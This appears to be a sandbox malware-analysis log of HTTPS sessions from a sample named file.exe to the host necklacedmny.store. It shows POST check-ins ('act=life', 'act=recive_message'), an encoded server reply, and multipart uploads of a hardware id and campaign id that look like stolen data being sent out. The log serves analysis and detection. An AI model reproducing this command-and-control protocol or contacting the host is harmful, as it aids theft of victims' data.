                                                                        0192.168.2.549704188.114.96.34436136C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-30 05:16:00 UTC265OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-10-30 05:16:01 UTC1020INHTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=vmkimelef33hrm3vk9kt3lo06k; expires=Sat, 22 Feb 2025 23:02:39 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Vm01XXBir6lxBnYFo8pEiuZ4Uo%2FL%2Fjz6te%2FmOFKn1WanvYQYBIB9HXG50s8HVlGsGW3ivSTZc0rhsXgFuES%2BWbFitk6ASC7t2bSIVK6CJJ%2BknrBTBBNzjjHOmPGRN3UEE%2FQyLQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee481c702897-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2365&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1202657&cwnd=251&unsent_bytes=0&cid=8f595d999411c77a&ts=1046&x=0"
                                                                        2024-10-30 05:16:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                        Data Ascii: 2ok
                                                                        2024-10-30 05:16:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549705188.114.96.34436136C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-30 05:16:01 UTC266OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 52
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:01 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                        Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                        2024-10-30 05:16:02 UTC1011INHTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=1ersttirpq19ssc6j325f9dq5m; expires=Sat, 22 Feb 2025 23:02:41 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6FY7rTYV18TxJnjFCtyf2x42NrmZ7l0pKO293cYEi5cPa5r2F%2B6NOys8swI55ctT5ig8PaZBxT71vXwr44KEa9tNbymN%2FPJBXcRlrjWhywxvPkm5W6XsRAh1zWfAhDteJbjYG20%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee50afda35a0-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2551541&cwnd=231&unsent_bytes=0&cid=1ff3616a43a9f6f9&ts=487&x=0"
                                                                        2024-10-30 05:16:02 UTC358INData Raw: 34 34 36 63 0d 0a 46 48 4d 6f 67 52 67 78 67 45 6d 57 50 4b 61 4c 44 57 54 30 6f 52 55 4e 6d 6c 4c 6d 53 32 71 6e 75 76 56 31 4e 4b 6b 4e 50 7a 68 76 55 56 36 6a 49 67 57 73 61 2b 56 5a 68 4c 46 35 46 6f 48 45 4f 53 2f 37 4e 73 52 78 44 4d 62 57 68 68 41 59 69 33 74 53 47 69 34 56 53 65 31 72 56 4b 78 72 38 30 53 45 73 56 59 66 31 73 52 37 4c 36 42 77 67 79 45 49 78 74 61 58 46 46 2f 47 66 56 4e 62 66 42 39 50 36 58 31 53 35 43 6a 36 55 63 50 75 61 41 57 65 7a 33 78 67 38 6a 2f 45 5a 30 6a 43 77 4e 64 50 46 75 52 6f 53 31 6c 5a 45 6c 76 71 4f 6b 79 73 4d 72 52 5a 79 4b 6b 33 52 70 58 45 64 32 48 38 4e 6f 30 6a 41 73 2f 65 6c 68 46 65 32 57 52 5a 55 48 77 52 54 4f 68 33 57 2f 41 6c 38 46 62 49 36 47 49 46 31 6f 30 33 61 4f 42 77 33 47 6c 62 39 39 75 47 42
                                                                        Data Ascii: 446cFHMogRgxgEmWPKaLDWT0oRUNmlLmS2qnuvV1NKkNPzhvUV6jIgWsa+VZhLF5FoHEOS/7NsRxDMbWhhAYi3tSGi4VSe1rVKxr80SEsVYf1sR7L6BwgyEIxtaXFF/GfVNbfB9P6X1S5Cj6UcPuaAWez3xg8j/EZ0jCwNdPFuRoS1lZElvqOkysMrRZyKk3RpXEd2H8No0jAs/elhFe2WRZUHwRTOh3W/Al8FbI6GIF1o03aOBw3Glb99uGB
                                                                        2024-10-30 05:16:02 UTC1369INData Raw: 2f 46 58 50 37 48 30 4e 6e 38 35 36 62 2f 55 36 69 79 6f 49 77 74 4b 64 47 46 7a 50 59 6c 42 63 64 68 45 4b 72 54 70 55 2b 6d 75 73 48 75 66 73 66 77 47 61 31 54 56 56 75 43 2f 4b 4d 45 6a 43 31 4e 64 50 46 73 4e 71 58 6c 6c 39 48 6b 6e 72 63 55 48 69 4f 66 4a 54 77 66 74 70 41 35 6a 4a 64 48 33 79 50 6f 49 71 41 63 37 52 6b 68 42 53 69 79 45 64 58 57 35 52 45 71 4e 62 58 75 6b 6e 2f 6b 6e 45 71 58 42 49 6a 34 4e 77 59 37 68 6f 78 43 30 4a 77 64 6d 54 47 56 6a 50 59 31 74 55 65 78 35 4d 36 58 70 55 36 43 50 38 58 38 6e 69 59 41 61 54 7a 6e 4e 70 39 44 47 42 61 55 61 46 33 34 39 58 44 6f 74 42 57 6c 6c 6b 55 33 2f 67 64 46 33 6c 50 62 52 42 69 76 41 76 41 5a 71 44 4c 79 2f 32 4e 59 73 37 43 64 66 64 6d 51 56 61 7a 6d 6c 51 57 58 67 52 54 2b 52 33 58 65 51
                                                                        Data Ascii: /FXP7H0Nn856b/U6iyoIwtKdGFzPYlBcdhEKrTpU+musHufsfwGa1TVVuC/KMEjC1NdPFsNqXll9HknrcUHiOfJTwftpA5jJdH3yPoIqAc7RkhBSiyEdXW5REqNbXukn/knEqXBIj4NwY7hoxC0JwdmTGVjPY1tUex5M6XpU6CP8X8niYAaTznNp9DGBaUaF349XDotBWllkU3/gdF3lPbRBivAvAZqDLy/2NYs7CdfdmQVazmlQWXgRT+R3XeQ
                                                                        2024-10-30 05:16:02 UTC1369INData Raw: 76 41 76 41 5a 71 44 4c 79 2f 30 4f 59 51 69 41 73 48 59 6b 42 70 54 79 47 68 65 56 33 45 62 52 4f 52 2b 58 2b 73 6d 38 6c 37 44 37 57 6f 55 6b 38 70 37 59 37 68 2b 78 43 34 51 68 59 44 58 4f 46 48 64 62 48 4a 5a 5a 78 67 4b 2f 44 52 4b 6f 69 7a 34 48 70 79 70 61 41 4f 65 79 48 46 6e 2b 43 4b 42 4a 77 50 45 30 70 45 57 57 38 64 70 58 56 74 32 46 30 62 6a 66 56 54 77 4f 66 46 59 31 75 4d 76 53 4e 62 45 62 79 2b 67 63 4c 49 35 48 39 54 4f 31 53 4a 56 78 57 46 61 54 44 59 4f 42 50 6f 36 56 4f 35 72 72 42 37 50 36 57 4d 42 6e 73 56 7a 5a 2f 63 2f 6a 54 73 4a 79 64 61 46 45 46 62 43 59 56 4a 57 66 78 78 4e 37 6e 46 5a 37 79 2f 7a 58 34 53 6e 4c 77 47 4f 67 79 38 76 7a 69 43 4a 4a 53 62 4f 31 4a 35 58 53 59 56 32 48 56 31 36 55 52 4b 6a 66 6c 2f 71 49 66 74 58
                                                                        Data Ascii: vAvAZqDLy/0OYQiAsHYkBpTyGheV3EbROR+X+sm8l7D7WoUk8p7Y7h+xC4QhYDXOFHdbHJZZxgK/DRKoiz4HpypaAOeyHFn+CKBJwPE0pEWW8dpXVt2F0bjfVTwOfFY1uMvSNbEby+gcLI5H9TO1SJVxWFaTDYOBPo6VO5rrB7P6WMBnsVzZ/c/jTsJydaFEFbCYVJWfxxN7nFZ7y/zX4SnLwGOgy8vziCJJSbO1J5XSYV2HV16URKjfl/qIftX
                                                                        2024-10-30 05:16:02 UTC1369INData Raw: 47 53 78 58 67 76 74 6e 43 44 4d 55 69 64 6d 4c 67 77 59 34 6c 4f 5a 78 70 70 58 31 4f 6a 66 56 2b 69 63 37 52 53 78 2b 56 6e 43 5a 44 4b 65 32 58 78 4f 34 67 69 44 4d 6e 52 6b 68 46 58 7a 6d 70 63 58 6e 6f 62 54 4f 42 35 58 4f 30 6b 2f 42 36 4b 71 57 67 65 31 70 73 33 53 75 38 37 69 69 39 49 32 70 61 4f 56 31 48 48 4c 77 55 61 65 68 68 4d 35 58 39 66 34 79 33 38 57 38 7a 74 62 67 43 51 77 48 68 72 2f 54 47 4c 4c 51 54 4c 30 70 59 57 57 73 42 67 56 6c 38 32 58 77 72 6b 59 68 4f 36 61 38 56 64 30 76 35 2f 43 74 62 63 4f 58 61 34 4e 34 68 70 55 49 58 5a 68 52 31 63 78 57 70 53 58 33 55 65 54 65 35 38 58 2b 67 69 2f 46 6a 4c 34 48 30 46 6d 73 31 77 59 66 51 2b 69 53 4d 4c 79 4a 6a 5a 56 31 48 54 4c 77 55 61 57 68 5a 48 7a 58 46 66 35 57 76 72 45 4e 32 70 61
                                                                        Data Ascii: GSxXgvtnCDMUidmLgwY4lOZxppX1OjfV+ic7RSx+VnCZDKe2XxO4giDMnRkhFXzmpcXnobTOB5XO0k/B6KqWge1ps3Su87ii9I2paOV1HHLwUaehhM5X9f4y38W8ztbgCQwHhr/TGLLQTL0pYWWsBgVl82XwrkYhO6a8Vd0v5/CtbcOXa4N4hpUIXZhR1cxWpSX3UeTe58X+gi/FjL4H0Fms1wYfQ+iSMLyJjZV1HTLwUaWhZHzXFf5WvrEN2pa
                                                                        2024-10-30 05:16:02 UTC1369INData Raw: 33 4e 37 67 47 67 7a 6b 59 78 70 71 6d 41 56 58 64 5a 46 42 57 4e 67 34 45 2b 6a 70 55 37 6d 75 73 48 73 4c 6d 5a 67 57 5a 77 6e 35 6a 39 54 57 4e 4c 41 6e 44 33 4a 30 64 56 73 31 70 58 46 39 38 45 6b 76 70 63 31 54 71 4c 50 64 4d 68 4b 63 76 41 59 36 44 4c 79 2f 52 4e 35 59 6e 47 49 58 48 32 51 34 57 7a 47 4d 64 41 6a 59 56 51 4f 78 2b 56 4f 34 74 38 56 6a 4a 36 47 41 48 6c 73 78 7a 5a 50 45 32 68 53 51 4e 79 4e 79 46 48 56 33 45 59 31 52 57 65 31 45 45 6f 33 31 4c 6f 6e 4f 30 62 38 6e 6e 59 51 47 41 67 32 67 68 34 58 43 44 4a 55 69 64 6d 4a 59 62 57 63 68 67 58 6c 6c 33 47 31 6a 78 64 6c 72 71 4c 76 68 56 79 75 39 39 41 4a 6e 4b 64 47 7a 78 4e 34 77 6c 41 73 62 66 31 31 6b 57 7a 48 63 64 41 6a 59 79 58 66 4e 33 45 2f 31 6c 37 52 37 44 35 53 39 65 31 73
                                                                        Data Ascii: 3N7gGgzkYxpqmAVXdZFBWNg4E+jpU7musHsLmZgWZwn5j9TWNLAnD3J0dVs1pXF98Ekvpc1TqLPdMhKcvAY6DLy/RN5YnGIXH2Q4WzGMdAjYVQOx+VO4t8VjJ6GAHlsxzZPE2hSQNyNyFHV3EY1RWe1EEo31LonO0b8nnYQGAg2gh4XCDJUidmJYbWchgXll3G1jxdlrqLvhVyu99AJnKdGzxN4wlAsbf11kWzHcdAjYyXfN3E/1l7R7D5S9e1s
                                                                        2024-10-30 05:16:02 UTC1369INData Raw: 50 34 73 67 41 63 48 51 6c 42 64 53 7a 32 68 59 57 58 6f 61 54 65 42 31 56 2b 73 6c 2f 56 47 45 70 79 38 42 6a 6f 4d 76 4c 39 6b 72 68 79 55 46 68 63 66 5a 44 68 62 4d 59 78 30 43 4e 68 31 45 35 6e 70 5a 35 43 2f 78 57 4d 37 73 62 77 32 56 7a 48 4e 70 2f 44 2b 45 49 67 48 45 33 70 49 64 58 63 31 69 58 6c 78 77 55 51 53 6a 66 55 75 69 63 37 52 2b 33 2b 52 6a 41 64 62 63 4f 58 61 34 4e 34 68 70 55 49 58 54 6d 78 4e 52 79 32 4a 65 55 6e 4d 56 51 4f 5a 36 57 2f 41 6a 39 46 6e 57 2b 32 38 50 6b 38 39 30 62 2f 77 32 6a 53 38 4c 77 5a 6a 5a 56 31 48 54 4c 77 55 61 57 78 31 4e 79 6e 31 49 6f 6a 53 36 52 34 54 75 59 30 62 4f 67 33 5a 6b 38 6a 2b 4a 4b 67 37 47 30 35 49 64 56 38 78 6e 55 45 68 31 48 6b 58 6e 65 6c 7a 6b 4c 66 56 52 77 75 35 6d 42 35 37 45 4e 79 47
                                                                        Data Ascii: P4sgAcHQlBdSz2hYWXoaTeB1V+sl/VGEpy8BjoMvL9krhyUFhcfZDhbMYx0CNh1E5npZ5C/xWM7sbw2VzHNp/D+EIgHE3pIdXc1iXlxwUQSjfUuic7R+3+RjAdbcOXa4N4hpUIXTmxNRy2JeUnMVQOZ6W/Aj9FnW+28Pk890b/w2jS8LwZjZV1HTLwUaWx1Nyn1IojS6R4TuY0bOg3Zk8j+JKg7G05IdV8xnUEh1HkXnelzkLfVRwu5mB57ENyG
                                                                        2024-10-30 05:16:02 UTC1369INData Raw: 77 4c 43 79 4a 41 41 57 59 73 68 48 56 55 32 53 58 4f 6a 63 31 54 35 4f 75 4a 54 31 4f 34 76 4f 64 69 44 62 79 2b 67 63 4c 45 71 42 73 76 66 67 51 59 62 37 48 6c 58 58 57 59 57 58 65 77 36 48 61 49 74 74 41 61 58 70 79 38 43 68 34 4d 76 50 36 70 72 30 58 70 66 6c 59 71 49 57 55 2b 4c 65 52 30 43 4a 46 38 4b 38 54 6f 4c 6f 6d 7a 33 54 4e 62 76 62 42 43 56 68 45 6c 52 33 79 71 4a 4c 78 2f 55 35 71 6b 51 54 4d 5a 70 53 6b 73 36 42 45 6e 74 64 46 54 30 61 37 6f 65 79 36 6b 33 50 39 61 4c 4e 31 43 32 63 4a 78 70 55 49 58 74 6c 42 6c 59 7a 48 6c 4d 46 31 45 4c 52 2b 56 74 51 71 4a 6c 74 46 69 45 73 54 39 49 31 73 64 6d 4c 36 42 67 31 6e 4a 64 6c 6f 2f 48 52 55 6d 46 64 68 31 4d 4e 6b 6b 59 72 54 70 42 6f 6e 4f 30 47 63 66 37 66 51 43 56 31 58 51 6f 78 67 36 71
                                                                        Data Ascii: wLCyJAAWYshHVU2SXOjc1T5OuJT1O4vOdiDby+gcLEqBsvfgQYb7HlXXWYWXew6HaIttAaXpy8Ch4MvP6pr0XpflYqIWU+LeR0CJF8K8ToLomz3TNbvbBCVhElR3yqJLx/U5qkQTMZpSks6BEntdFT0a7oey6k3P9aLN1C2cJxpUIXtlBlYzHlMF1ELR+VtQqJltFiEsT9I1sdmL6Bg1nJdlo/HRUmFdh1MNkkYrTpBonO0Gcf7fQCV1XQoxg6q
                                                                        2024-10-30 05:16:02 UTC1369INData Raw: 75 5a 47 56 48 64 66 68 42 39 65 42 5a 4c 39 57 70 45 37 57 75 36 48 73 4b 70 4e 31 54 59 67 33 4e 2b 75 47 6a 55 65 31 4f 51 69 38 42 48 42 4e 51 68 52 42 70 67 55 52 4b 78 4e 42 50 77 61 36 77 65 67 2b 70 39 46 4a 44 41 59 57 79 2f 44 72 6f 4f 42 73 4c 5a 67 51 64 42 78 43 42 7a 62 46 63 76 64 50 5a 35 58 65 77 73 34 6b 2b 45 70 79 38 4a 31 70 74 4f 4c 37 42 77 75 32 64 49 33 5a 6a 50 56 32 50 49 59 56 4e 64 59 41 41 48 78 48 52 55 34 7a 33 6b 53 63 75 6d 51 54 43 33 67 7a 6b 76 2f 6e 44 63 65 30 61 46 33 49 5a 58 44 70 73 39 42 67 38 6c 52 68 71 78 5a 52 33 37 61 2b 49 65 6e 4c 73 68 52 6f 53 44 4c 79 2b 2f 4d 35 59 37 44 73 62 4f 6c 46 42 6f 39 55 68 54 58 58 63 48 57 75 35 32 63 75 45 36 2f 6d 44 36 2f 47 77 49 6d 4d 52 68 66 72 68 2b 78 43 5a 49 6e
                                                                        Data Ascii: uZGVHdfhB9eBZL9WpE7Wu6HsKpN1TYg3N+uGjUe1OQi8BHBNQhRBpgURKxNBPwa6weg+p9FJDAYWy/DroOBsLZgQdBxCBzbFcvdPZ5Xews4k+Epy8J1ptOL7Bwu2dI3ZjPV2PIYVNdYAAHxHRU4z3kScumQTC3gzkv/nDce0aF3IZXDps9Bg8lRhqxZR37a+IenLshRoSDLy+/M5Y7DsbOlFBo9UhTXXcHWu52cuE6/mD6/GwImMRhfrh+xCZIn
                                                                        2024-10-30 05:16:02 UTC1369INData Raw: 56 32 32 68 6a 5a 46 73 44 54 66 4e 35 45 63 34 73 2b 56 4c 36 31 31 67 58 6b 64 4d 31 53 66 73 6d 68 32 6c 47 68 63 44 58 54 78 62 6d 66 56 70 4b 64 56 4e 6d 35 48 64 66 6f 6a 53 36 52 34 54 2f 4c 31 37 46 6a 54 64 39 75 47 6a 45 62 67 76 58 79 70 45 55 51 4d 67 6f 59 32 52 62 41 30 33 7a 65 52 48 54 4a 76 42 49 30 65 70 2f 41 61 6a 39 57 6e 33 2f 49 49 64 72 4c 66 2b 61 70 67 46 56 79 32 46 61 47 6a 68 52 55 71 4d 69 45 38 38 35 38 30 37 48 71 30 6f 38 31 50 4a 68 62 50 67 2b 67 32 6b 58 69 38 48 58 41 52 61 54 50 42 4d 61 5a 46 45 53 6f 7a 31 64 37 79 72 33 55 4d 66 37 66 51 43 56 31 58 51 6f 78 67 36 72 49 67 6e 56 31 59 59 61 55 74 31 52 59 33 31 77 46 45 33 64 52 47 54 7a 4c 4f 51 63 34 75 70 35 42 64 61 4e 4e 33 65 34 61 4d 51 4f 44 73 44 66 31 31
                                                                        Data Ascii: V22hjZFsDTfN5Ec4s+VL611gXkdM1Sfsmh2lGhcDXTxbmfVpKdVNm5HdfojS6R4T/L17FjTd9uGjEbgvXypEUQMgoY2RbA03zeRHTJvBI0ep/Aaj9Wn3/IIdrLf+apgFVy2FaGjhRUqMiE885807Hq0o81PJhbPg+g2kXi8HXARaTPBMaZFESoz1d7yr3UMf7fQCV1XQoxg6rIgnV1YYaUt1RY31wFE3dRGTzLOQc4up5BdaNN3e4aMQODsDf11


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549706188.114.96.34436136C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-30 05:16:03 UTC284OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 12840
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:03 UTC12840OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:03 UTC1021INHTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=7q9so91ph1ssld90ev68p15o4j; expires=Sat, 22 Feb 2025 23:02:42 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFewHGF%2F2t%2BXmC0tHbP4gJdYj6HGmD8rrp7fl5kpOJFPpRQDXT1poHLyVlP07znneFPu%2FAONYRzYEBVrOqgSqpxJkFsssausZdyhfa0q5lEUo8gG%2FOi4M%2B508XBrWyU58z2tT8k%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee5a2c7ee79e-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1369&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13782&delivery_rate=2184012&cwnd=252&unsent_bytes=0&cid=d2e5b498eaa9046e&ts=705&x=0"
                                                                        2024-10-30 05:16:03 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                        Data Ascii: 11ok 173.254.250.78
                                                                        2024-10-30 05:16:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549707188.114.96.34436136C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-30 05:16:04 UTC284OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 15082
                                                                        Host: necklacedmny.store
                                                                        2024-10-30 05:16:04 UTC15082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 36 42 35 33 31 31 31 41 39 30 39 30 37 32 37 32 31 30 41 38 43 44 38 39 33 34 38 31 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"266B53111A9090727210A8CD89348154--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                        2024-10-30 05:16:05 UTC1020INHTTP/1.1 200 OK
                                                                        Date: Wed, 30 Oct 2024 05:16:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=rlgck53vpcro6nia7hta1knvp3; expires=Sat, 22 Feb 2025 23:02:44 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTP%2FHfbm7jG0ugfbOCBvYzl33etFvnlCvvvGy1h3Hy7l1V9%2Blj%2BdLE5vJdqYBl%2BrgktnCTFua5Kclq7t15svrZZSs5P87MZ02FhH0Z3whdDNXv0BO7jgQ8CgkilPF%2F7h2pwZW34%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8da8ee628f13e766-DFW
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=2473099&cwnd=239&unsent_bytes=0&cid=664ad5736fba1fb5&ts=554&x=0"
                                                                        2024-10-30 05:16:05 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                        Data Ascii: 11ok 173.254.250.78
                                                                        2024-10-30 05:16:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549708188.114.96.34436136C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-30 05:16:06 UTC284OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 20572
                                                                        Host: necklacedmny.store
